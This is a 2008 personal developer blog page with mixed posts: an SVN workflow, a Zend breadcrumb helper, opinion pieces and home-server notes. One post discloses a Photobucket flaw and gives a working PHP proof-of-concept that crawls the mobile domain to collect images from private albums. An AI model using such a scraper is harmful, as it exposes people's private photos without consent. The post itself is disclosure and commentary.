Joey Adams Dot Net

Southern Fried Programming

Subversive Development for the Serious Web Professional

July 26th, 2008 by Joey in Uncategorized | No Comments →

I won’t go into detail explaining version control, because there are countless articles and papers in the wild about it. I am, however going to explain how I am implementing Subversion into my current development environment.

First, my reasons for using version control

  • No SPOF(Single point of failure) -  My flow always has 3 concurrent copies of the source at any given point, so if one machine fails fatily, my project data is still safe.
  • Repository - Having a repository means I can revert to older versions if needed, as well as keep up with changes made each step along the way.
  • No direct Editing- I never have to touch staging or live servers, I only modify the development copy, so that human error is reduced ten-fold.

Here is how it all works.

I have 3 machines ,   dev/repo/serv  , where dev is my development workstation, repo is the machine hosting the subversion repository, and serv is my http server.

On the http server, in my projects directory, there is a folder for each project I am working on. In the individual project folder, there are 3 other folders, dev/staging/live.

Using Virtual Hosts on httpserv, I make the development folder only accesible by my local network, the staging folder is available by password protection, and the live server is publicly available.

 I use Zend Studio For Eclipse with  a Subversion/PHP Project and use WebDrive to securely map the projects dev folder onto my local machine. I create/edit/modify project files from my workstation (which holds a cache of project files) on the dev folder on my http server.

I edit files from my workstation, and view the changes on the development vhost. Once I finish adding a module/functionality/milestone on the project and want the clients’ approval, I use a script called  svn_sync.sh located in each projects main directory.

Svn_sync.sh, first makes sure you have committed changes to the trunk aka dev folder, after that you specify what source you want to merge and update. Once I finish adding features, I merge the trunk into the staging branch, and update the working copy inside the staging folder. I now can show the client the changes.

Once I have his approval, I run svn_sync.sh again, and have it merge the staging branch into the live branch, and then update the live directory aka The live server.

That is my SDLC (Software development life-cycle). Things are neat and tidy, and I only make changes to the trunk/development folder of the project.

This method is everything I could wish for, High Availability, Reliable, Robust, scalable, and professional.

Sure direct editing and copy -r  work, and I maybe overdoing it as a single developer, but I am very happy with my results and would recommend anyone wanting the experience to do the same.

Web Application Security Survey

July 21st, 2008 by Joey in Uncategorized | No Comments →

It is unarguable that Jeremiah Grossman is a pretty big name in Web Application Security. I really enjoy reading his and Robert (aka Mr. XSS, RSnake) Hansens’ posts. They tend to have a lot of great info, and a lot of fun things to be a part of.

 Jeremiah has his W.A.S. Survey up for anyone that works around the field to take. Some of the questions are really inquisitive.

 Anyway, if you work around the field, you should take the survey. Head on over to his site to take the survey.

View private Photobucket accounts via Mobile-Web

July 18th, 2008 by Joey in Uncategorized | 2 Comments →

Photobucket has done it again. It appears that using the mobile-web domain (m55.photobucket.com), if you navigate to a valid image, you can use the previous/next links to view more photos in the account, even if it is set to private.

I have not checked, but I believe the hole has been patched. I was informed of this exploit by a friend Jessie McKnight. The catch to it, was that the prev/next buttons are initially very small (hence mobile web), and clicking all those links take a lot of time.

I hacked up a working script in about an hour, that takes a valid picture URL and visits it, scrapes the previous link, copies the image name and writes it encapsuled in an image tag to a html file using the original photobucket url (not the mobile domain), then it repeats this process on the url obtained by the prev anchor.

This was a very intensive process so I capped it at 50 requests, and storing the pictures on a seperate page allowed for quicker retrievals while the script was crawling, also for saving results from different people using the script at the same time.

This is in no way an optimized script, this was thrown together from scrap to completion in under an hour, but is just a P.O.C

<form method="GET" action=''>
URL TO VALID PICTURE: <input type='text' name='album'><br/>
<input type='submit'>
</form>

<?php

if(isset($_GET['album'])){
$fh = fopen('photos.html','a');
$get_album = $_GET['album'];
$picture = substr(substr($get_album,strrpos($get_album,'/')),1);
$albumurl = substr($get_album,0,strrpos($get_album,'/'));
$album = substr(substr($albumurl,strrpos($albumurl,'/')),1);
$url = "http://m55.photobucket.com/albumview/albums/{$album}/{$picture}.html?";
$i=0;
while($i <= 100){
	$url = getPrevUrl($url);
	$im = getImage($url,$albumurl);
	fwrite($fh,$im);
	echo $im;
	$i++;
}
fclose($fh);
}

function getPrevUrl($url){
  $input = @file_get_contents($url) or die('Could not access file: $url');
  $regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
  if(preg_match_all("/$regexp/siU", $input, $matches)) {
	$photoUrl = "http://m55.photobucket.com" . $matches[2][4];
	return $photoUrl;
	}else{
		return $url;
	}
}

function getImage($url,$alburl){
	$photoUrl = substr($url,0,strrpos($url,"."));
	$photoUrl = substr($photoUrl,strrpos($photoUrl,"/"));
	$photoUrl = $alburl . $photoUrl;
	return "<img src='$photoUrl'/><br/>";
}

Major ISP’s agree on child pornography filtering.

July 18th, 2008 by Joey in Uncategorized | No Comments →

I have not went into detail about this agreement, but you can be certain, whenever ISP’s ban together to prevent something, it hurts the consumer.

Filtering slows down speeds (minutely), but the real flaw in filtering is the use of a non-certain list. Whitelist or Blacklisting, there are ALWAYS false positives when you do not have an exact plain-text match.

 I am definately against child pornography, however, false positives from filtering, and the way some ISPs like to communicate with law enforcement could cause a myriad of problems for everyday households. Prosecution should be done through cooperation with web hosting companies that are hosting accounts with this type of content on it. Filtering is not mature enough yet.

 For instance, AT&T customers, this blog post even, might be filtered away in the given year. Just for it’s title.

 Filtering, throttling, anything other than providing direct internet connectivity is a horrible breach of trust and net neutrality, boo!

WTF Facebook!?

July 18th, 2008 by Joey in Uncategorized | No Comments →

If you haven’t heard about the beacon in facebook publishing private data, then you have been under a rock. But wait, beacon is now an opt-out service, so this is old news, right?

Wrong!

According to a post on slashdot, beacon still tracks you whether you are logged into facebook or not. I had high hopes for facebook, being an advocate of php and open source technology, but shame, shame on you facebook.

This issue needs more spotlight.

Home Server Speed + Development Changes

June 28th, 2008 by Joey in Electronics, Projects, development, php | 1 Comment →

Last week I moved everything in a couple rooms of the house around, and now my workstation and server cabinet are in my room (and it hot as hell, I run like 4 electric fans + ceiling fan just to cool down).

I am now in a situation, which is fun for any enthusiast. I love redoing the network, or just working on it. I am seeing some speed issues with this site, and my other projects. Of course these are not meant to be highly available or that fast anyway, but they are suffering performance issues greatly.

 I am suspecting the Rackmount Hub I have in the cabinet that hooks the servers together with the network. I am going to try to get a rackmount switch, and see if that helps out, which it should.

The network environment is a mess right now, although an ordered mess, haha. I need to build the rest of a PC  to have in the living room to power the extender for my home PVR, I am going to just use a crossover cable to connect the two, then connect the pc wirelessly to the network to get updates and guides.

The windows server is not doing the print server correctly, nor have I finished setting up the fax, because I lack another phone. So if you call the house 3 times, you get data tones :) .

I have also switched my development flow to using subversion, and never t0uching production folders. I am using WebDrive to map the projects directory to my pc, and using ZendStudio’s svn functions to make changes to the trunk of the projects repo, which runs on the windows server. Whenever I am ready to show a client a new feature, I copy the trunk to the staging branch, and update the staging directory.

The staging server is password protected so only me and the client can see development. The development server is only accessible to my local network. Once the client approves the changes, I will copy the staging branch to the live branch, then update the live(production) folder.

 This effectively makes several backups of the source, at different states, on different harddrives, and I never have to touch files in the production environment, this is a very important concept.

Just a note on Zend Studio, also note I am using ZS for Eclipse. I really wish it had some type of remote-svn project resource. Or even a remote-project resource that you could have say a ‘php’ or ‘framework’ project without hacking up the project settings. It just made it very difficult to use its built-in project settings with svn on a remote server, which is a very very common development environment. 

Zend just has never been very good with community support. I am not sure about their product support, but the forums are a ghost town, and offer not much help, and emailing them does hardly any good, ALTHOUGH it may have changed.

I submitted several requests on a lot of different emails about my profile in the zend yellow pages after getting my ZCE , because I could not edit the details, this was about a year and a half ago, I just now a few weeks ago received an email saying it was fixed haha.

So maybe they have a new support team.

I will write up some network statistics after changing, and a how-to for subversion development at home.

Breadcrumbs with Zend Framework

June 22nd, 2008 by Joey in Zend Framework, development, php | No Comments →

I was integrating breadcrumbs into a site I am currently building and figured I would share the code I used to make it possible.

This project uses a MODULAR layout, so theres no solutions out there that helped me out. I wanted it to display cleanly, without displaying things like ‘default’ as the module name, and not to display a breadcrumb if it was the home page (ie. default module, index controller, index action).

 Basically it is a view helper that you call, and it fetches everything for you.

Some things to know. It pulls  ’siteurl’ from the Zend_Registry, you can change this if you want, well you can change anything you want, it’s nothing special, but it may help someone out there.

 Just add this viewhelper

<?php

/**
* BreadCrumb View Helper
*@author Joey Adams
*
*/
class ViewHelpers_BreadCrumb {

public function breadCrumb() {
$module = Zend_Controller_Front::getInstance()->getRequest()->getModuleName();
$l_m = strtolower($module);

$controller = Zend_Controller_Front::getInstance()->getRequest()->getControllerName();
$l_c = strtolower($controller);

$action = Zend_Controller_Front::getInstance()->getRequest()->getActionName();
$l_a = strtolower($action);

// HomePage = No Breadcrumb
if($l_m == 'default' && $l_c == 'index' && $l_a == 'index'){
return;
}

// Get our url and create a home crumb
$url = Zend_Registry::get('siteurl');
$homeLink = "<a href='{$url}/'>Home</a>";

// Start crumbs
$crumbs = $homeLink . " > ";

// If our module is default
if($l_m == 'default') {

if($l_a == 'index'){
$crumbs .= $controller;
} else {
$crumbs .= "<a href='{$url}/{$controller}/'>$controller</a> > $action";
}
} else {
// Non Default Module
if($l_c == 'index' && $l_a == 'index') {
$crumbs .= $module;
} else {
$crumbs .= "<a href='{$url}/{$module}/'>$module</a> > ";
if($l_a == 'index') {
$crumbs .= $controller;
} else {
$crumbs .= "<a href='{$url}/{$module}/{$controller}/'>$controller</a> > $action";
}
}

}
return $crumbs;
}

}

Zend Studio, Fedora Core 9, and my laptop dv8000

May 25th, 2008 by Joey in Uncategorized | No Comments →

I’ve been dying to have a Linux workstation. I have BackTrack 3 installed in VM on my desktop, but that is not enough. I miss my gentoo installation, and considered it, but it just takes too long and my schedule is more than full.

I cannot change over my desktop OS due to using Media Center for my home pvr, see other posts for details. Also because I game every now and then, and use the CS3 suite, so oh well. Dual booting is not worth it when I can work off a VM.

So my laptop is the choice then, with it’s semi-broken screen and all. I decide to go with Fedora, it’s an easy install, a programmers type of distro, and I am familiar with it from the past.  I download Fedora 9 Sulphur for amd64, install was FLAWLESS, just perfect. Boot up, everything works like supposed to.

Zend Studio Fedora 9

Read the rest of this entry »

LifeLock CEO……. Identity Gets Stolen

May 25th, 2008 by Joey in Id10t's, security | 1 Comment →

Keep knocking on the Devil’s door and someone is bound to answer. And Answer they did when Todd Davis, CEO of LifeLock, had his identity stolen. The exact thing his entire company is responsible for stopping. This has got to be one of the greatest things I have seen in a while. I cannot even think about it without laughing. I have no idea if the ss# he was ‘giving away’ on those commercials was valid or not, but when you put yourself in the public cross-hair like that, you should expect things to happen.

From what I have read, his company is being sued by some individuals for misconception, or deception, or something or another. This may have been one mishap, and not to discredit the entire company, shit happens, but I really like services like these with the number of id thefts going around these days. I am not for, however, deception, and trying to get money on the weakness of good willing people. Robert Hansen, or Rsnake, has done some looking and found some pretty weird wordings on their site .

All in all, a good laugh.

AT&T/Bellsouth Filtering SMTP out vs My postfix, IIS mail servers

May 23rd, 2008 by Joey in Projects, Uncategorized, development | 2 Comments →

If I have ever spoken to you regarding mail servers, it was probably a frustrating conversation. Me and mail servers just do not get along. I have tried numerous times on all sorts of platforms from unix to linux and windows to get sendmail, postfix, even iis to work correctly.

Well, as a developer, I am needing mail functionality in my php applications. I also would like my joeyadams.net and other domains to be able to have unique email addresses. I already have a windows 2k3 server set up for file/print and previously mail with exchange, which actually worked… well some of the time.

 So here is my plan, on my redhat box, ditch sendmail, use postfix. On win2k3 setup simple iis smtp and pop3 services.

Read the rest of this entry »

← Previous Entries